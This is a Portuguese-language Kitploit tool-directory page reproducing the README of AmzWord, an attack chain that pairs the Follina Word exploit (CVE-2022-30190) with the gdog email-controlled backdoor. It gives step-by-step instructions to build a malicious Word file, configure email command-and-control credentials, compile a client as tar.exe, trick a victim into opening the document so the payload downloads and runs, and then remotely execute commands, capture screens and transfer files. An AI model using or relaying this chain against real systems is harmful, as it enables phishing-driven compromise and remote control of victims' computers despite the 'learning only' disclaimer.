Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
AmzWord — Uma cadeia de ataque automatizada baseada em CVE-2022-30190, backdoor de e-mail 163 e esteganografia de imagens. | Kitploit
Ferramentas/GitHubGitHub/jump-wang-111/amzword
Ferramentas de PhishingGeração de PayloadsExploraçãoExploração de Aplicações WebEsteganografiaComando e ControleEngenharia SocialAprendizado e EducaçãoSegurança de Email
GitHubjump-wang-111/amzword

AmzWord

Uma cadeia de ataque automatizada baseada em CVE-2022-30190, backdoor de e-mail 163 e esteganografia de imagens.

12há 2 anosAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar
Ver Repositório

AmzWord

uma cadeia de ataque automatizada baseada em CVE-2022-30190, backdoor de e-mail 163 e esteganografia de imagem

Agradecemos aos seguintes repositórios do GitHub, dos quais referenciamos e modificamos parte do código para integrar e implementar nosso trabalho:

  • gdog
  • follina
  • virtual-reality

README em chinês veja aqui

Requisitos

gdog:

  • Python 2.7
  • Módulo PyCrypto
  • Módulo WMI
  • Módulo Enum34
  • Módulo Netifaces

follina:

  • Python 3.x

Uso e processo de ataque

  1. Use follina.py para construir um arquivo Word malicioso e ativar a escuta http

    • Você pode alterar o nome padrão e o ip padrão no código
    • Você também pode usar --ip e --output para especificar
    • Consulte follina para obter detalhes de uso. Não alteramos a interface de uso.
    • ex: python follina.py --ip 100.100.100.100 --output maldoc.doc
  2. Modifique client.py e gdog.py dentro de gdog e preencha as seguintes informações

    root@kitploit:~
    gmail_user = 'your email'
    gmail_pwd = 'your pwd'
    server = "smtp server"
    imap_server = 'imap server'
    
  3. Compile client.py em tar.exe e coloque-o em /follina/www

  4. Use qualquer método de engenharia social para enviá-lo ao alvo. Assim que a vítima abrir o Word, o tar.exe será baixado e executado automaticamente.

  5. O atacante executa o gdog localmente e envia comandos para controlar a máquina alvo. Para uso, veja gdog

Observação

  1. Isso é apenas uma demonstração da implementação da cadeia de ataque. O exe em execução pode até ser encontrado no gerenciador de tarefas, o que facilita a observação do efeito. Não realizamos nenhuma operação como antivírus, ocultação e escalada de privilégios. Claro, essas não são difíceis no Windows, certo?
  2. O projeto gdog existe há muito tempo, e gastamos muito esforço para fazê-lo funcionar com sucesso. Os comandos de controle remoto atualmente confirmados incluem: executar comandos, capturar telas, exibir janelas pop-up, desligar, bloquear a tela e transferir arquivos. Essas funções são suficientes para atender à maioria das necessidades.
  3. Não sei por que, mas parece haver algum problema com a pesquisa SUBJECT do imap. Não conseguimos pesquisar e-mails com o assunto alvo, e o valor de retorno está vazio. Só podemos adotar outros métodos, como ler todos os e-mails não lidos, filtrar os alvos e depois marcar os outros como não lidos. Isso pode causar problemas quando houver muitos usuários controlados e precisa ser resolvido.
  4. Este projeto é apenas para fins de aprendizado e intercâmbio.
Baixar ferramenta